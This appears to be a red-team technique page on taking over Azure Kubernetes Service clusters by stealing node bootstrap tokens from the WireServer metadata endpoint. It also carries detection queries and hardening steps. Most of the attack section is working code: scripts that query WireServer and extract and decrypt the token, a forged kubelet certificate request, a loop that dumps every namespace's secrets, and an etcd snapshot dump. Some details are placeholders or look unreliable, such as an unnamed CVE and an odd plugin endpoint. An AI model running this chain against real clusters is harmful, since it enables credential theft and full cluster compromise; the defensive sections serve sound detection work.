| Attribute | Details |
|---|---|
| Technique ID | IA-EXPLOIT-005 |
| MITRE ATT&CK v18.1 | T1190 - Exploit Public-Facing Application |
| Tactic | Initial Access |
| Platforms | Entra ID, Azure (AKS), Cloud Metadata Services |
| Severity | Critical |
| CVE | CVE-2025-21196 (CVSS 9.5) |
| Related CVE | CVE-2024-XXXXX (WireServing - Mandiant discovery) |
| Technique Status | ACTIVE (Patched in 1.28.4+, but many clusters unpatched) |
| Last Verified | 2025-12-30 |
| Affected Versions | AKS 1.25.0 - 1.28.3 (pre-patch) |
| Patched In | AKS 1.28.4+ ; Mitigation available for affected versions |
| Author | SERVTEP – Artur Pchelnikau |
Note: Sections 6 (Atomic Red Team) and 11 (Sysmon Detection) are not included because: (1) no specific Atomic test exists for AKS control plane exploitation, and (2) this is a cloud-native component without local system instrumentation. All section numbers have been renumbered based on applicability.
Concept: CVE-2025-21196 affects Azure Kubernetes Service (AKS) versions 1.25.0 through 1.28.3 due to misconfiguration in container orchestration layer access controls. The vulnerability, combined with the related “WireServing” attack vector discovered by Mandiant, allows attackers to escalate privileges from pod execution context to full cluster control. By exploiting undocumented Azure WireServer endpoints accessible from pods, attackers can extract TLS bootstrap tokens, impersonate nodes, and bypass Kubernetes RBAC entirely to access all cluster secrets.[115][116][117][118]
Attack Surface: AKS control plane components (API server, scheduler, controller manager), Azure WireServer metadata service (accessible at 169.254.169.254 and 168.63.129.16), HostGAPlugin endpoints, etcd (if exposed), Custom Script Extension provisioning artifacts, Entra ID authentication tokens.
Business Impact: Complete cluster compromise without detection. Attackers gain full read/write access to all Kubernetes resources, can extract confidential data (API keys, database credentials), modify workloads, establish persistence, and pivot to underlying Azure infrastructure. The vulnerability affects any AKS cluster running versions prior to 1.28.4 with Azure CNI networking and “Azure” network policy configured.[118][136]
Technical Context: The vulnerability is not a zero-day code flaw but rather a design weakness in how AKS bootstraps nodes and secures inter-component communication. Exploitation requires initial code execution in a pod (via kubelet RCE, phishing, supply chain compromise, or legitimate access), but from there, the attacker can escalate to full cluster control in seconds without triggering alerts.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Kubernetes v1.24 | 1.1.1 | API server --authorization-mode must include RBAC |
| CIS Kubernetes v1.24 | 1.4.1 | Kubelet --read-only-port should be disabled |
| CIS Kubernetes v1.24 | 1.4.2 | Kubelet authentication should be enabled |
| DISA STIG | SV-245839 | API server must enforce authorization controls |
| NIST 800-53 | AC-3 | Access Enforcement (authorization bypass) |
| NIST 800-53 | AC-6 | Least Privilege (default allow-all for anonymous) |
| GDPR | Art. 32 | Security of Processing (inadequate access controls) |
| PCI DSS | 2.2 | Change default settings; remove unnecessary services |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27001 | A.12.4.3 | Logging of administrator activities |
Supported Versions: AKS 1.25.0 - 1.28.3
Tools:
# Check AKS cluster version
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# Expected vulnerable output:
# "1.27.9" or earlier within 1.25-1.28 range
# Check if patched
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# If version >= 1.28.4, cluster is patched (but may still be misconfigured)
# Verify Azure CNI networking (prerequisite for CVE-2025-21196)
az aks show --resource-group <RG> --name <CLUSTER> --query "networkProfile.networkPlugin"
# Expected: "azure" (vulnerable); "kubenet" is not affected by this CVE specifically
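The version boundary checks above can be automated. A minimal sketch, using only the affected-versions range stated in this document (1.25.0 - 1.28.3); the helper names are illustrative:

```python
# Sketch: decide whether an AKS version reported by `az aks show` falls in
# the vulnerable range 1.25.0 - 1.28.3 stated in this document.

def parse_version(v: str) -> tuple:
    """Turn '1.27.9' (optionally quoted, as az prints it) into (1, 27, 9)."""
    return tuple(int(part) for part in v.strip('"').split("."))

def is_vulnerable(version: str) -> bool:
    """True if the version is within the pre-patch range."""
    return (1, 25, 0) <= parse_version(version) <= (1, 28, 3)
```

Feed it the raw string from the `--query kubernetesVersion` output; a patched cluster (1.28.4+) returns False, though it may still be misconfigured.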
# From inside a pod, test WireServer connectivity
kubectl exec -it <POD_NAME> -- curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# If successful response (200 OK):
# {"compute": {...}, "network": {...}} - WireServer IS accessible
# Query HostGAPlugin endpoint
curl -s "http://168.63.129.16/machine?comp=versions"
# If responds with JSON version info - plugin is accessible
# From kubectl (with cluster-admin access)
kubectl -n kube-system describe pod -l component=kube-apiserver | grep authorization-mode
# Expected vulnerable: "AlwaysAllow" or missing (defaults to AlwaysAllow)
# Expected secure: "RBAC" or "RBAC,Node"
# Check if anonymous auth is enabled
kubectl -n kube-system describe pod -l component=kube-apiserver | grep anonymous-auth
# Vulnerable: "--anonymous-auth=true" (default)
# Secure: "--anonymous-auth=false"
# Check if system:anonymous has cluster-admin privileges
kubectl get clusterrolebindings -o json | jq '.items[] | select(.subjects[]? | select(.kind == "User" and .name == "system:anonymous")) | .roleRef'
# If result shows cluster-admin role, cluster is highly vulnerable
# Check what permissions anonymous users have
kubectl auth can-i list pods --as=system:anonymous
kubectl auth can-i get secrets --as=system:anonymous
kubectl auth can-i create pods --as=system:anonymous
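The jq binding check above can also be done offline against saved cluster output. A sketch, assuming input shaped like `kubectl get clusterrolebindings -o json` (the function name is illustrative):

```python
import json

# Sketch: scan ClusterRoleBinding items for a subject named
# system:anonymous and report which roles it is bound to.
# `subjects` may be null on some bindings, hence the `or []`.

def anonymous_roles(bindings_json: str) -> list:
    items = json.loads(bindings_json).get("items", [])
    roles = []
    for item in items:
        for subject in item.get("subjects") or []:
            if subject.get("kind") == "User" and subject.get("name") == "system:anonymous":
                roles.append(item["roleRef"]["name"])
    return roles
```

A non-empty result containing `cluster-admin` means the cluster is highly vulnerable, matching the jq check above.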
Supported Versions: AKS 1.25.0 - 1.28.3
Objective: Gain code execution inside a running pod
Prerequisite Access Vectors:
Assumed Starting Point: Code execution in pod as any user (non-root OK)
Objective: Extract TLS bootstrap tokens and node certificates from Azure metadata service
Command (Python automation):
#!/usr/bin/env python3
import json

import requests

# WireServer endpoint (accessible from all Azure VMs/pods)
WIRESERVER = "http://168.63.129.16"

# Step 1: Get cluster configuration
try:
    # Fetch machine configuration with version string
    resp = requests.get(f"{WIRESERVER}/machine?comp=versions")
    print("[+] WireServer Response:")
    print(resp.text)
    # Parse response to find configuration endpoint
    config = json.loads(resp.text)

    # Step 2: Extract goals (contains encrypted settings)
    resp_goals = requests.get(f"{WIRESERVER}/machine?comp=goals")
    print("[+] Goals endpoint:")
    print(resp_goals.text)

    # Step 3: Query certificates endpoint (may expose certs in plaintext or encrypted)
    resp_certs = requests.get(f"{WIRESERVER}/machine?comp=certs")
    print("[+] Certificates:")
    print(resp_certs.text)
except Exception as e:
    print(f"[-] WireServer query failed: {e}")

# Step 4: Query HostGAPlugin endpoint (decrypt protected settings)
try:
    # Request to decrypt protected settings (contains provisioning script with bootstrap token)
    resp_plugin = requests.get(f"{WIRESERVER}/?comp=GetDriveBypassFilters")
    print("[+] HostGAPlugin Response:")
    print(resp_plugin.text)
except Exception as e:
    print(f"[-] HostGAPlugin access failed: {e}")
Expected Output:
{
  "compute": {
    "vmId": "12345678-1234-1234-1234-123456789012",
    "location": "eastus",
    "name": "aks-nodepool1-12345678-vm000001"
  },
  "network": {
    "interface": [
      {
        "ipv4": {
          "ipAddress": [
            {"privateIpAddress": "10.0.0.5"}
          ]
        }
      }
    ]
  }
}
What This Means:
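The metadata response identifies the underlying node and its private address, which the later node-impersonation steps need. A minimal parsing sketch, assuming input shaped exactly like the Expected Output block above:

```python
import json

# Sketch: pull the attacker-relevant fields (VM ID, node name, private IP)
# out of an instance-metadata response shaped like the sample above.

def summarize_metadata(raw: str) -> dict:
    doc = json.loads(raw)
    iface = doc["network"]["interface"][0]
    return {
        "vm_id": doc["compute"]["vmId"],
        "node_name": doc["compute"]["name"],
        "private_ip": iface["ipv4"]["ipAddress"][0]["privateIpAddress"],
    }
```

The `name` field (e.g. `aks-nodepool1-...-vm000001`) is the value reused as `NODE_NAME` in the certificate request step below.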
OpSec & Evasion:
Troubleshooting:
- Connection refused to 168.63.129.16
- Empty response from HostGAPlugin (try alternate endpoints: /machine?comp=cert, /health)

Objective: Extract TLS bootstrap token from encrypted WireServer response
Command (Python - using CyberCX research):
#!/usr/bin/env python3
import base64
import re
import subprocess

import requests

# Step 1: Query WireServer to get protected settings
wireserver_url = "http://168.63.129.16/?comp=Config"
response = requests.get(wireserver_url, headers={'Metadata': 'true'})

# The response contains a JSON blob with encrypted settings;
# extract the ProtectedSettings field
data = response.json()
protected_settings = data.get("Compute", {}).get("protectedSettings", "")

# Step 2: Decrypt using openssl (requires the wireserver key, which may
# need to be extracted separately; for this PoC, assume we have it)
WIRESERVER_KEY = "<hex-encoded-aes-key>"

try:
    # Decrypt the blob (openssl reads the ciphertext from stdin; depending
    # on how the blob is framed, an -iv argument may also be required)
    decrypted = subprocess.run(
        ['openssl', 'enc', '-aes-256-cbc', '-d', '-K', WIRESERVER_KEY],
        input=base64.b64decode(protected_settings),
        capture_output=True,
    )
    if decrypted.returncode == 0:
        plaintext = decrypted.stdout.decode(errors="replace")
        print("[+] Decrypted Protected Settings:")
        print(plaintext)
        # Parse the provisioning script for environment variables
        # containing TLS_BOOTSTRAP_TOKEN
        token_match = re.search(r'TLS_BOOTSTRAP_TOKEN=([A-Za-z0-9._-]+)', plaintext)
        if token_match:
            bootstrap_token = token_match.group(1)
            print(f"[+] EXTRACTED BOOTSTRAP TOKEN: {bootstrap_token}")
except Exception as e:
    print(f"[-] Decryption failed: {e}")
Expected Output:
[+] EXTRACTED BOOTSTRAP TOKEN: eyJhbGciOiJSUzI1NiIsImtpZCI6IkNzc1R4NHhzbEFmcHJYOW9pQlY1YVg0cjRubzBURkZjZlowNVFNZzFmM2MifQ.eyJpc3MiOiJodHRwczovL2t1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2NhbCIsImt1YmVybmV0ZXMuaW8iOnsibmFtZXNwYWNlIjoiIiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImJvb3RzdHJhcCIsInVpZCI6Ijc5ZTA3MjY2LWEyNWEtNDY0ZC1iOGVmLWQ4MDc1YjZhOTZkZiJ9fSwibmJmIjoxNzM1NzAxMDA0LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YmluZC1mb3ItYWtzbm9kZS1zZXJ2aWNlLWFjY291bnQifQ.LahpIVKr...
What This Means:
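The extracted token is a JWT, so its claims (issuer, subject, service account) can be inspected without the signing key. A minimal sketch; the function name is illustrative:

```python
import base64
import json

# Sketch: decode a JWT's payload without verifying its signature -
# split the token, restore the stripped base64url padding, and parse.
# Useful to confirm the token's subject/claims before using it.

def jwt_claims(token: str) -> dict:
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # base64url strips '=' padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

Applied to the token above, the claims show the bootstrap service account identity the attacker is about to assume.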
Objective: Use bootstrap token to request legitimate kubelet certificate
Command:
#!/bin/bash
# Variables
BOOTSTRAP_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IkNzc1R4NHhzbEFmcHJYOW9pQlY1YVg0cjRubzBURkZjZlowNVFNZzFmM2MifQ..."
API_SERVER="kubernetes.default.svc.cluster.local"
NODE_NAME="aks-nodepool1-12345678-vm000001"
CA_CERT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
# Step 1: Create certificate signing request (CSR)
openssl genrsa -out kubelet.key 2048
openssl req -new -key kubelet.key \
-subj "/O=system:nodes/CN=system:node:${NODE_NAME}" \
-out kubelet.csr
# Encode CSR in base64
ENCODED_CSR=$(base64 -w0 < kubelet.csr)
# Step 2: Submit CSR to API server using bootstrap token
curl -X POST \
-H "Authorization: Bearer ${BOOTSTRAP_TOKEN}" \
-H "Content-Type: application/json" \
-H "X-Kubernetes-PKCS10: true" \
-d "{\"apiVersion\": \"certificates.k8s.io/v1\", \"kind\": \"CertificateSigningRequest\", \"metadata\": {\"name\": \"${NODE_NAME}\"}, \"spec\": {\"request\": \"${ENCODED_CSR}\", \"signerName\": \"kubernetes.io/kube-apiserver-client\", \"usages\": [\"digital signature\", \"key encipherment\", \"client auth\"]}}" \
https://${API_SERVER}:6443/apis/certificates.k8s.io/v1/certificatesigningrequests
# Step 3: Approve CSR (usually auto-approved if token is valid)
# OR manually approve via kubectl (if attacker has appropriate RBAC)
# Step 4: Retrieve signed certificate
curl -X GET \
-H "Authorization: Bearer ${BOOTSTRAP_TOKEN}" \
https://${API_SERVER}:6443/apis/certificates.k8s.io/v1/certificatesigningrequests/${NODE_NAME} \
| jq '.status.certificate' | base64 -d > kubelet.crt
echo "[+] Kubelet certificate obtained!"
echo "[+] Can now authenticate to API server as node: ${NODE_NAME}"
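The JSON body posted by the curl call above can be built programmatically. A sketch mirroring that request; note the `usages` list uses `client auth`, which is what the `kubernetes.io/kube-apiserver-client` signer accepts (the helper name is illustrative):

```python
import json

# Sketch: build the CertificateSigningRequest body submitted to the API
# server. node_name and the base64-encoded PEM CSR are assumed inputs.

def build_csr_body(node_name: str, encoded_csr: str) -> str:
    return json.dumps({
        "apiVersion": "certificates.k8s.io/v1",
        "kind": "CertificateSigningRequest",
        "metadata": {"name": node_name},
        "spec": {
            "request": encoded_csr,
            "signerName": "kubernetes.io/kube-apiserver-client",
            "usages": ["digital signature", "key encipherment", "client auth"],
        },
    })
```

The CSR's subject (`/O=system:nodes/CN=system:node:<name>`) is what makes the resulting certificate a node identity; the JSON body only wraps and submits it.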
Expected Behavior:
Impact:
system:nodes group (node authority level)

Objective: Read all Kubernetes secrets across all namespaces
Command:
#!/bin/bash
# Using new kubelet certificate, authenticate to API server
export KUBECONFIG=/tmp/attacker-kubeconfig.yaml
# Create kubeconfig with stolen certificate
cat > ${KUBECONFIG} <<EOF
apiVersion: v1
kind: Config
clusters:
- cluster:
    certificate-authority: ${CA_CERT}
    server: https://${API_SERVER}:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: system:node:${NODE_NAME}
  name: default
current-context: default
users:
- name: system:node:${NODE_NAME}
  user:
    client-certificate-data: $(base64 -w0 < kubelet.crt)
    client-key-data: $(base64 -w0 < kubelet.key)
EOF
# Step 1: List all namespaces
kubectl get namespaces
# Step 2: Extract all secrets from all namespaces
for namespace in $(kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'); do
  echo "[+] Extracting secrets from namespace: $namespace"
  kubectl get secrets -n $namespace -o json | \
    jq '.items[] | {name: .metadata.name, namespace: .metadata.namespace, data}' \
    > secrets-${namespace}.json
done
# (Secret values inside the JSON remain base64-encoded; decode individual keys with `base64 -d`.)
# Step 3: Dump specific sensitive secrets
kubectl get secret -A -o json | jq '.items[] | select(.data.password or .data."api-key" or .data.token) | {namespace: .metadata.namespace, name: .metadata.name, keys: .data | keys}'
echo "[+] All secrets extracted! Check secrets-*.json files"
Expected Output:
{
"namespace": "default",
"name": "database-credentials",
"keys": ["password", "username"]
}
{
"namespace": "kube-system",
"name": "etcd-client-cert",
"keys": ["ca.crt", "client.crt", "client.key"]
}
{
"namespace": "azure-system",
"name": "azure-cloud-provider-secret",
"keys": ["subscription-id", "client-id", "client-secret", "tenant-id"]
}
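Kubernetes stores Secret values base64-encoded, so the dumped JSON still needs one decoding pass. A minimal sketch, assuming input shaped like a single item from `kubectl get secret -o json`:

```python
import base64

# Sketch: decode every base64 value in a Kubernetes Secret's `data` map
# into its plaintext form.

def decode_secret(secret: dict) -> dict:
    return {
        key: base64.b64decode(value).decode()
        for key, value in secret.get("data", {}).items()
    }
```

Running this over each item in the `secrets-*.json` dumps yields the plaintext credentials (passwords, API keys, service principal secrets) listed above.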
What This Means:
Supported Versions: All AKS versions with misconfigured RBAC
Command:
# If API server is exposed publicly
curl -sk https://<API_SERVER_IP>:6443/api/v1/secrets
# Expected vulnerable response:
# {"kind":"SecretList","apiVersion":"v1","metadata":{"resourceVersion":"12345"},"items":[...]}
# Expected secure response:
# {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
Command:
# If anonymous auth is enabled and has permissions
# (anonymous requests carry no Authorization header; the API server maps them to system:anonymous)
curl -sk https://<API_SERVER_IP>:6443/api/v1/namespaces/kube-system/secrets \
  | jq '.items[] | {name: .metadata.name, data: .data | keys}'
Supported Versions: All AKS versions with exposed etcd
Command:
# Extract etcd client certificates from control plane
# (Requires admin access or successful bootstrap attack)
ETCD_CERT="/etc/kubernetes/pki/etcd/healthcheck-client.crt"
ETCD_KEY="/etc/kubernetes/pki/etcd/healthcheck-client.key"
ETCD_CA="/etc/kubernetes/pki/etcd/ca.crt"
ETCD_ENDPOINT="https://etcd.kube-system.svc.cluster.local:2379"
# Query all secrets from etcd
etcdctl --endpoints=${ETCD_ENDPOINT} \
--cert=${ETCD_CERT} \
--key=${ETCD_KEY} \
--cacert=${ETCD_CA} \
get "" --prefix | grep -i secret
# Dump entire cluster state
etcdctl --endpoints=${ETCD_ENDPOINT} \
--cert=${ETCD_CERT} \
--key=${ETCD_KEY} \
--cacert=${ETCD_CA} \
snapshot save backup.db
# Analyze snapshot
etcdctl snapshot restore backup.db --data-dir=restored-data/
Impact:
Rule Configuration:
- Index: azure_activity, kubernetes
- Sourcetype: kubernetes:pod:logs, azure:virtualnetwork:flow
- Required fields: src_ip, dest_ip, dest_port, process_name, command

SPL Query:
sourcetype="kubernetes:pod:logs"
(dest_ip="168.63.129.16" OR dest_ip="169.254.169.254") AND dest_port IN (80, 443)
| stats count by pod_name, namespace, dest_ip, dest_port, process_name
What This Detects:
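The same detection logic can be expressed outside Splunk, e.g. in a log-processing script. A sketch over flow records whose field names mirror the sourcetype above:

```python
# Sketch: flag any pod-sourced connection to the WireServer or IMDS
# endpoints on ports 80/443, matching the SPL rule above.

METADATA_IPS = {"168.63.129.16", "169.254.169.254"}

def flag_metadata_access(flows: list) -> list:
    """Return the subset of flow records that touch the metadata endpoints."""
    return [
        flow for flow in flows
        if flow.get("dest_ip") in METADATA_IPS and flow.get("dest_port") in (80, 443)
    ]
```

Any hit from a workload pod (as opposed to node agents, which legitimately talk to WireServer) warrants investigation.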
Rule Configuration:
- Index: kubernetes_audit
- Sourcetype: kubernetes:kube-apiserver:audit
- Required fields: verb, apiGroup, objectRef.kind, sourceIPs

SPL Query:
sourcetype="kubernetes:kube-apiserver:audit"
verb="create" "objectRef.kind"="CertificateSigningRequest"
| bin _time span=5m
| stats count by sourceIPs, user, _time
| where count > 5
What This Detects:
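The thresholded count from the SPL rule above, as plain Python over audit events (field names are illustrative, mirroring Kubernetes audit records):

```python
from collections import Counter

# Sketch: count CSR-create audit events per source IP and report sources
# exceeding the threshold (>5, matching the SPL rule above).

def csr_burst_sources(events: list, threshold: int = 5) -> list:
    counts = Counter(
        event["sourceIP"] for event in events
        if event.get("verb") == "create"
        and event.get("kind") == "CertificateSigningRequest"
    )
    return [ip for ip, count in counts.items() if count > threshold]
```

A legitimate node joins once; a burst of CSRs from one source IP is the signature of automated bootstrap-token abuse.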
Rule Configuration:
- Tables: ContainerLog, NetworkConnection
- Required fields: DestinationIp, DestinationPort, ProcessName, Computer

KQL Query:
NetworkConnection
| where DestinationIp in ("168.63.129.16", "169.254.169.254")
    and (DestinationPort == 80 or DestinationPort == 443)
    and Computer contains "aks"
| extend SourceContainer = extract(@"container[^_]*_(\w+)", 1, Computer)
| summarize AccessCount = count() by SourceContainer, DestinationIp, DestinationPort, bin(TimeGenerated, 5m)
| where AccessCount > 2
What This Detects:
Manual Configuration (Azure Portal):
- Rule name: WireServer Access from Container Pod
- Severity: High
- Query frequency: 1 minute

Rule Configuration:
- Tables: KubernetesAudit, SecurityEvent
- Required fields: OperationName, ObjectRef.name, verb

KQL Query:
KubernetesAudit
| where verb == "create" and ObjectRef.kind == "CertificateSigningRequest"
| extend CSRName = tostring(ObjectRef.name)
| where CSRName contains "node" or CSRName contains "system:node"
| summarize CSRCount = count(), UniqUsers = dcount(User) by Computer
| where CSRCount > 1 or UniqUsers > 1
What This Detects:
Alert Name: “Suspicious WireServer Metadata Service Access from Container”
Alert Name: “Rapid API Server Certificate Signing Requests Detected”
Manual Configuration (Enable Defender for Cloud):
Reference: Microsoft Defender for Cloud - Kubernetes Threat Detection
Command (Isolate Compromised Pod):
# Delete compromised pod immediately
kubectl delete pod <POD_NAME> -n <NAMESPACE> --grace-period=0 --force
# Cordon node if pod escape suspected
kubectl cordon <NODE_NAME>
# Or via Azure:
az aks nodepool scale --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --node-count 0
Command (Revoke Stolen Certificates):
# Identify and delete compromised CSRs
kubectl get csr | grep -E "system:node|Pending" | awk '{print $1}' | xargs kubectl delete csr
# Rotate all kubelet certificates
# (Requires cluster rebuild via AKS API)
az aks nodepool delete --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL>
az aks nodepool add --resource-group <RG> --cluster-name <CLUSTER> --name <NEW_NODEPOOL>
Command (Export Audit Logs):
# Export API server audit logs
kubectl logs -n kube-system -l component=kube-apiserver | grep -E "CertificateSigningRequest|Unauthorized|Bootstrap" > api-server-audit.log
# Export container logs from suspicious pod
kubectl logs <POD_NAME> -n <NAMESPACE> --previous > container-logs.txt
# Export full cluster state (warning: contains secrets)
kubectl get all -A -o json > cluster-state-full.json
Command (Identify Attack Timeline):
# Review CSR creation times
kubectl get csr -o json | jq '.items[] | {name: .metadata.name, creationTime: .metadata.creationTimestamp, signerName: .spec.signerName}'
# Check for bootstrap token usage
grep -r "bootstrap" /var/log/kubernetes/* 2>/dev/null | grep -E "token|authenticated"
# Review node authentication logs
journalctl -u kubelet | grep -i "bootstrap\|auth\|certificate"
Command (Revoke and Renew):
# Revoke all existing kubelet certificates
# (on AKS nodes, kubelet certificates typically live under /var/lib/kubelet/pki)
for cert in /var/lib/kubelet/pki/kubelet*; do
  rm -f "$cert"
done
# Force certificate renewal
systemctl restart kubelet
# Verify new certificates are issued
kubectl get csr -o json | jq '.items[-5:] | .[] | {name: .metadata.name, age: .metadata.creationTimestamp}'
Command (Update AKS Cluster):
# Upgrade AKS cluster to patched version (1.28.4+)
az aks upgrade --resource-group <RG> --name <CLUSTER> --kubernetes-version 1.28.4
# Force upgrade of all node pools
az aks nodepool upgrade --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --kubernetes-version 1.28.4
1. Update AKS Cluster to Patched Version (1.28.4+)
Manual Steps (Azure Portal):
Manual Steps (Azure CLI):
# Update control plane
az aks upgrade --resource-group <RG> --name <CLUSTER> --kubernetes-version 1.28.4
# Update node pools
az aks nodepool upgrade --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --kubernetes-version 1.28.4
Validation Command:
# Verify cluster version
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# Expected: "1.28.4" or higher
2. Disable Anonymous Authentication
Manual Steps (Kubernetes Configuration):
# Add to AKS cluster creation/update
apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-apiserver-params
data:
  anonymous-auth: "false"
  authorization-mode: "RBAC"
3. Restrict WireServer Access with Network Policies
Manual Steps (Kubernetes Network Policy):
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-metadata-service
  namespace: default
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector: {}
    ports:
    - protocol: TCP
      port: 443
  # Allow all other egress but carve out the metadata endpoints,
  # which denies pods access to them
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 168.63.129.16/32    # WireServer
        - 169.254.169.254/32  # Azure IMDS
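The intent of the `except` clause above (egress to anything except the metadata endpoints) can be sanity-checked with a small script; the CIDR strings are copied from the policy, the function name is illustrative:

```python
import ipaddress

# Sketch: an egress destination is allowed only if it does NOT fall inside
# one of the excepted metadata CIDRs from the NetworkPolicy above.

BLOCKED = [
    ipaddress.ip_network(cidr)
    for cidr in ("168.63.129.16/32", "169.254.169.254/32")
]

def egress_allowed(dest_ip: str) -> bool:
    addr = ipaddress.ip_address(dest_ip)
    return not any(addr in net for net in BLOCKED)
```

Note that `ipBlock.except` only shapes what this allow rule matches; the effective deny comes from Kubernetes policy semantics (anything not matched by an egress rule is dropped once `policyTypes: [Egress]` applies).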
4. Implement Pod Security Standards (Restricted)
Manual Steps:
# Label namespace with restricted PSS
kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
# Verify
kubectl get namespace default --show-labels
5. Enable Azure RBAC for Kubernetes (Dual Control)
Manual Steps (Terraform):
resource "azurerm_kubernetes_cluster" "aks" {
  name                              = "secure-aks"
  role_based_access_control_enabled = true

  azure_active_directory_role_based_access_control {
    managed                = true
    azure_rbac_enabled     = true
    admin_group_object_ids = [data.azuread_group.admins.object_id]
  }

  api_server_access_profile {
    authorized_ip_ranges = ["YOUR_OFFICE_IP/32", "YOUR_VPN_IP/32"]
  }

  # (location, resource_group_name, dns_prefix, default_node_pool and
  # identity blocks omitted for brevity)
}
6. Restrict API Server Access
Manual Steps (Azure Portal):
7. Enable Auditing and Monitoring
Manual Steps:
# Enable Kubernetes audit logging via diagnostic settings (kube-audit category)
az monitor diagnostic-settings create --resource <AKS_RESOURCE_ID> \
  --name aks-audit --workspace <LOG_ANALYTICS_WORKSPACE_ID> \
  --logs '[{"category": "kube-audit", "enabled": true}]'
# Configure Azure Monitor (Container Insights) integration
az aks enable-addons --resource-group <RG> --name <CLUSTER> \
  --addons monitoring \
  --workspace-resource-id /subscriptions/.../resourcegroups/.../providers/microsoft.operationalinsights/workspaces/<NAME>
8. Rotate All Credentials Immediately
Manual Steps:
# Rotate all Kubernetes service account tokens
kubectl get secret -A --field-selector type=kubernetes.io/service-account-token \
  -o jsonpath='{range .items[*]}{.metadata.namespace}{" "}{.metadata.name}{"\n"}{end}' | \
  while read -r ns name; do kubectl delete secret -n "$ns" "$name"; done
# Force token regeneration by restarting workloads in every namespace
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  kubectl rollout restart deployment -n "$ns"
done
# Rotate Azure credentials (if exposed via secrets)
az ad sp credential reset --name <APP_ID>
Validation Command (Verify Mitigations):
# Check cluster version
az aks show -g <RG> -n <CLUSTER> --query kubernetesVersion
# Verify API server access is restricted
az aks show -g <RG> -n <CLUSTER> --query "apiServerAccessProfile.authorizedIpRanges"
# Expected: List of IP ranges (not empty/unrestricted)
# Verify network policies are enforced
kubectl describe networkpolicy -n kube-system
# Expected: Multiple policies restricting inter-pod communication
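The authorized-IP check above can be scripted for fleets of clusters. A sketch, assuming the raw JSON printed by the `--query "apiServerAccessProfile.authorizedIpRanges"` command (which is `null` when unrestricted):

```python
import json

# Sketch: a cluster fails validation if authorizedIpRanges is null or
# empty, i.e. the API server is reachable from any internet address.

def api_server_restricted(az_output: str) -> bool:
    ranges = json.loads(az_output)
    return bool(ranges)
```

Run it over each cluster's output and alert on any False, since an unrestricted API server is a prerequisite for the anonymous-access variants described earlier.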
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] | Kubelet RCE to gain pod execution |
| 2 | Reconnaissance | [T1526 - Cloud Service Discovery] | Enumerate WireServer endpoints |
| 3 | Current Step | [IA-EXPLOIT-005] | AKS Control Plane Exploitation via Bootstrap Token Theft |
| 4 | Lateral Movement | [T1550.001 - Use Alternate Authentication] | Authenticate as compromised node |
| 5 | Credential Access | [T1552.007 - Container API] | Extract all cluster secrets from etcd |
| 6 | Privilege Escalation | [T1134 - Access Token Manipulation] | Impersonate service accounts |
| 7 | Impact | [T1537 - Transfer Data to Cloud Account] | Exfiltrate secrets to attacker’s Azure account |